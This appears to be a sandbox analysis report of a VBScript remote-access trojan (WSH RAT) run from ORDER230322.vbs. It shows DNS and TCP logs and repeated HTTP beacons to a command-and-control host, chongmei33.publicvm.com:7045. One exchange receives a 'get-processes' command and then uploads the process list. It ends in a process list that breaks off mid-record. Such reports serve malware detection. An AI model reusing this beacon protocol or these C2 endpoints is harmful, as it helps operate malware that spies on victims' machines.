                      Mar 22, 2023 11:40:48.201731920 CET497287045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:48.201905012 CET497287045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:48.418164968 CET704549728103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:53.411237955 CET497297045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:53.626483917 CET704549729103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:53.626785994 CET497297045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:53.627793074 CET497297045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:53.837008953 CET704549729103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:53.837093115 CET497297045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:53.837235928 CET497297045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:54.044846058 CET704549729103.47.144.22192.168.2.3
                      Mar 22, 2023 11:41:00.629730940 CET497307045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:00.836034060 CET704549730103.47.144.22192.168.2.3
                      Mar 22, 2023 11:41:00.836148024 CET497307045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:00.836848974 CET497307045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:01.046806097 CET704549730103.47.144.22192.168.2.3
                      Mar 22, 2023 11:41:01.047061920 CET497307045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:01.047159910 CET497307045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:01.253143072 CET704549730103.47.144.22192.168.2.3
                      Mar 22, 2023 11:41:06.123452902 CET497317045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:06.384644032 CET704549731103.47.144.22192.168.2.3
                      Mar 22, 2023 11:41:06.384902000 CET497317045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:06.386063099 CET497317045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:06.719264984 CET704549731103.47.144.22192.168.2.3
                      Mar 22, 2023 11:41:06.719373941 CET497317045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:06.719757080 CET497317045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:06.984010935 CET704549731103.47.144.22192.168.2.3
                      Mar 22, 2023 11:41:11.818608999 CET497327045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:12.038789988 CET704549732103.47.144.22192.168.2.3
                      Mar 22, 2023 11:41:12.038964987 CET497327045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:12.041835070 CET497327045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:12.574285984 CET497327045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:12.857283115 CET704549732103.47.144.22192.168.2.3
                      Mar 22, 2023 11:41:12.857415915 CET497327045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:12.857495070 CET497327045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:13.119000912 CET704549732103.47.144.22192.168.2.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 22, 2023 11:37:51.070846081 CET | 62704 | 53 | 192.168.2.3 | 8.8.8.8
Mar 22, 2023 11:37:51.197526932 CET | 53 | 62704 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 22, 2023 11:37:51.070846081 CET | 192.168.2.3 | 8.8.8.8 | 0xdb34 | Standard query (0) | chongmei33.publicvm.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 22, 2023 11:37:51.197526932 CET | 8.8.8.8 | 192.168.2.3 | 0xdb34 | No error (0) | chongmei33.publicvm.com | | 103.47.144.22 | A (IP address) | IN (0x0001) | false
• chongmei33.publicvm.com:7045
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49698 | 103.47.144.22 | 7045 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2023 11:37:51.449934959 CET | 102 | OUT | POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.publicvm.com:7045
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49699 | 103.47.144.22 | 7045 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2023 11:37:58.976360083 CET | 103 | OUT | POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.publicvm.com:7045
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.3 | 49708 | 103.47.144.22 | 7045 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2023 11:38:50.072460890 CET | 126 | OUT | POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.publicvm.com:7045
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.3 | 49709 | 103.47.144.22 | 7045 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2023 11:38:55.844826937 CET | 126 | OUT | POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.publicvm.com:7045
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.3 | 49710 | 103.47.144.22 | 7045 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2023 11:39:01.482922077 CET | 127 | OUT | POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.publicvm.com:7045
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.3 | 49711 | 103.47.144.22 | 7045 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2023 11:39:07.144388914 CET | 128 | OUT | POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.publicvm.com:7045
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.3 | 49712 | 103.47.144.22 | 7045 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2023 11:39:12.966341972 CET | 129 | OUT | POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.publicvm.com:7045
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.3 | 49713 | 103.47.144.22 | 7045 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2023 11:39:18.634150028 CET | 130 | OUT | POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.publicvm.com:7045
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.3 | 49714 | 103.47.144.22 | 7045 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2023 11:39:24.263756990 CET | 130 | OUT | POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.publicvm.com:7045
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.3 | 49715 | 103.47.144.22 | 7045 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2023 11:39:32.263868093 CET | 131 | OUT | POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.publicvm.com:7045
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
Mar 22, 2023 11:39:32.979810953 CET | 132 | OUT | POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.publicvm.com:7045
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
18 | 192.168.2.3 | 49716 | 103.47.144.22 | 7045 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2023 11:39:38.695593119 CET | 132 | OUT | POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.publicvm.com:7045
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
19 | 192.168.2.3 | 49717 | 103.47.144.22 | 7045 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2023 11:39:44.283624887 CET | 133 | OUT | POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.publicvm.com:7045
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49700 | 103.47.144.22 | 7045 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2023 11:38:04.682959080 CET | 105 | OUT | POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.publicvm.com:7045
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
20 | 192.168.2.3 | 49718 | 103.47.144.22 | 7045 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2023 11:39:50.397216082 CET | 134 | OUT | POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.publicvm.com:7045
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
21 | 192.168.2.3 | 49719 | 103.47.144.22 | 7045 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2023 11:39:56.012176991 CET | 135 | OUT | POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.publicvm.com:7045
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
22 | 192.168.2.3 | 49720 | 103.47.144.22 | 7045 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2023 11:40:01.578388929 CET | 136 | OUT | POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.publicvm.com:7045
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
23 | 192.168.2.3 | 49721 | 103.47.144.22 | 7045 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2023 11:40:08.630285025 CET | 136 | OUT | POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.publicvm.com:7045
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
24 | 192.168.2.3 | 49722 | 103.47.144.22 | 7045 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2023 11:40:14.190562010 CET | 137 | OUT | POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.publicvm.com:7045
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
25 | 192.168.2.3 | 49723 | 103.47.144.22 | 7045 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2023 11:40:19.769701004 CET | 138 | OUT | POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.publicvm.com:7045
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


                      Session ID: 26 | Source IP: 192.168.2.3 | Source Port: 49724 | Destination IP: 103.47.144.22 | Destination Port: 7045 | Process: C:\Windows\System32\wscript.exe
                      Timestamp: Mar 22, 2023 11:40:25.447386026 CET | kBytes transferred: 139 | Direction: OUT | Data:
                      POST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID: 27 | Source IP: 192.168.2.3 | Source Port: 49725 | Destination IP: 103.47.144.22 | Destination Port: 7045 | Process: C:\Windows\System32\wscript.exe
                      Timestamp: Mar 22, 2023 11:40:31.131057024 CET | kBytes transferred: 140 | Direction: OUT | Data:
                      POST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID: 28 | Source IP: 192.168.2.3 | Source Port: 49726 | Destination IP: 103.47.144.22 | Destination Port: 7045 | Process: C:\Windows\System32\wscript.exe
                      Timestamp: Mar 22, 2023 11:40:36.721931934 CET | kBytes transferred: 140 | Direction: OUT | Data:
                      POST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID: 29 | Source IP: 192.168.2.3 | Source Port: 49727 | Destination IP: 103.47.144.22 | Destination Port: 7045 | Process: C:\Windows\System32\wscript.exe
                      Timestamp: Mar 22, 2023 11:40:42.430466890 CET | kBytes transferred: 141 | Direction: OUT | Data:
                      POST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID: 3 | Source IP: 192.168.2.3 | Source Port: 49701 | Destination IP: 103.47.144.22 | Destination Port: 7045 | Process: C:\Windows\System32\wscript.exe
                      Timestamp: Mar 22, 2023 11:38:10.473997116 CET | kBytes transferred: 105 | Direction: OUT | Data:
                      POST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID: 30 | Source IP: 192.168.2.3 | Source Port: 49728 | Destination IP: 103.47.144.22 | Destination Port: 7045 | Process: C:\Windows\System32\wscript.exe
                      Timestamp: Mar 22, 2023 11:40:47.984992981 CET | kBytes transferred: 142 | Direction: OUT | Data:
                      POST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID: 31 | Source IP: 192.168.2.3 | Source Port: 49729 | Destination IP: 103.47.144.22 | Destination Port: 7045 | Process: C:\Windows\System32\wscript.exe
                      Timestamp: Mar 22, 2023 11:40:53.627793074 CET | kBytes transferred: 143 | Direction: OUT | Data:
                      POST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID: 32 | Source IP: 192.168.2.3 | Source Port: 49730 | Destination IP: 103.47.144.22 | Destination Port: 7045 | Process: C:\Windows\System32\wscript.exe
                      Timestamp: Mar 22, 2023 11:41:00.836848974 CET | kBytes transferred: 144 | Direction: OUT | Data:
                      POST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID: 33 | Source IP: 192.168.2.3 | Source Port: 49731 | Destination IP: 103.47.144.22 | Destination Port: 7045 | Process: C:\Windows\System32\wscript.exe
                      Timestamp: Mar 22, 2023 11:41:06.386063099 CET | kBytes transferred: 144 | Direction: OUT | Data:
                      POST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID: 34 | Source IP: 192.168.2.3 | Source Port: 49732 | Destination IP: 103.47.144.22 | Destination Port: 7045 | Process: C:\Windows\System32\wscript.exe
                      Timestamp: Mar 22, 2023 11:41:12.041835070 CET | kBytes transferred: 145 | Direction: OUT | Data:
                      POST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Timestamp: Mar 22, 2023 11:41:12.574285984 CET | kBytes transferred: 146 | Direction: OUT | Data:
                      POST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID: 4 | Source IP: 192.168.2.3 | Source Port: 49702 | Destination IP: 103.47.144.22 | Destination Port: 7045 | Process: C:\Windows\System32\wscript.exe
                      Timestamp: Mar 22, 2023 11:38:16.269118071 CET | kBytes transferred: 106 | Direction: OUT | Data:
                      POST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID: 5 | Source IP: 192.168.2.3 | Source Port: 49703 | Destination IP: 103.47.144.22 | Destination Port: 7045 | Process: C:\Windows\System32\wscript.exe
                      Timestamp: Mar 22, 2023 11:38:21.870237112 CET | kBytes transferred: 107 | Direction: OUT | Data:
                      POST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Timestamp: Mar 22, 2023 11:38:22.107378006 CET | kBytes transferred: 107 | Direction: IN | Data:
                      HTTP/1.1 200 OK
                      Content-Length: 13
                      Connection: close
                      Data Raw: 67 65 74 2d 70 72 6f 63 65 73 73 65 73
                      Data Ascii: get-processes


                      Session ID: 6 | Source IP: 192.168.2.3 | Source Port: 49704 | Destination IP: 103.47.144.22 | Destination Port: 7045 | Process: C:\Windows\System32\wscript.exe
                      Timestamp: Mar 22, 2023 11:38:22.632777929 CET | kBytes transferred: 108 | Direction: OUT | Data:
                      POST /is-processes HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 4374
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID: 7 | Source IP: 192.168.2.3 | Source Port: 49705 | Destination IP: 103.47.144.22 | Destination Port: 7045 | Process: C:\Windows\System32\wscript.exe
                      Timestamp: Mar 22, 2023 11:38:31.858319998 CET | kBytes transferred: 123 | Direction: OUT | Data:
                      POST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID: 8 | Source IP: 192.168.2.3 | Source Port: 49706 | Destination IP: 103.47.144.22 | Destination Port: 7045 | Process: C:\Windows\System32\wscript.exe
                      Timestamp: Mar 22, 2023 11:38:37.956187010 CET | kBytes transferred: 124 | Direction: OUT | Data:
                      POST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID: 9 | Source IP: 192.168.2.3 | Source Port: 49707 | Destination IP: 103.47.144.22 | Destination Port: 7045 | Process: C:\Windows\System32\wscript.exe
                      Timestamp: Mar 22, 2023 11:38:44.353442907 CET | kBytes transferred: 124 | Direction: OUT | Data:
                      POST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Target ID: 0
                      Start time: 11:37:07
                      Start date: 22/03/2023
                      Path: C:\Windows\System32\wscript.exe
                      Wow64 process (32bit): false
                      Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER230322.vbs"
                      Imagebase: 0x7ff601d70000
                      File size: 163840 bytes
                      MD5 hash: 9A68ADD12EB50DDE7586782C3EB9FF9C
                      Has elevated privileges: false
                      Has administrator privileges: false
                      Programmed in: C, C++ or other language
                      Reputation: high

                      Target ID: 10
                      Start time: 11:37:28
                      Start date: 22/03/2023
                      Path: C:\Windows\System32\wscript.exe
                      Wow64 process (32bit): false
                      Commandline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
                      Imagebase: 0x7ff601d70000
                      File size: 163840 bytes
                      MD5 hash: 9A68ADD12EB50DDE7586782C3EB9FF9C
                      Has elevated privileges: false
                      Has administrator privileges: false
                      Programmed in: C, C++ or other language
                      Reputation: high

                      Target ID: 11
                      Start time: 11:37:41
                      Start date: 22/03/2023
                      Path: C:\Windows\System32\wscript.exe
                      Wow64 process (32bit): false
                      Commandline: C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
                      Imagebase: 0x7ff601d70000
                      File size: 163840 bytes
                      MD5 hash: 9A68ADD12EB50DDE7586782C3EB9FF9C
                      Has elevated privileges: false
                      Has administrator privileges: false
                      Programmed in: C, C++ or other language
                      Reputation: high

                      Target ID: 12
                      Start time: 11:37:51
                      Start date: 22/03/2023
                      Path: C:\Windows\System32\wscript.exe
                      Wow64 process (32bit): false
                      Commandline: C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
                      Imagebase: 0x7ff651c80000
                      File size: 163840 bytes
                      MD5 hash: 9A68ADD12EB50DDE7586782C3EB9FF9C
                      Has elevated privileges: false
                      Has administrator privileges: false
                      Programmed in: C, C++ or other language
                      Reputation: high

                      Target ID: 13
                      Start time: 11:38:00
                      Start date: 22/03/2023
                      Path: C:\Windows\System32\wscript.exe
                      Wow64 process (32bit): false
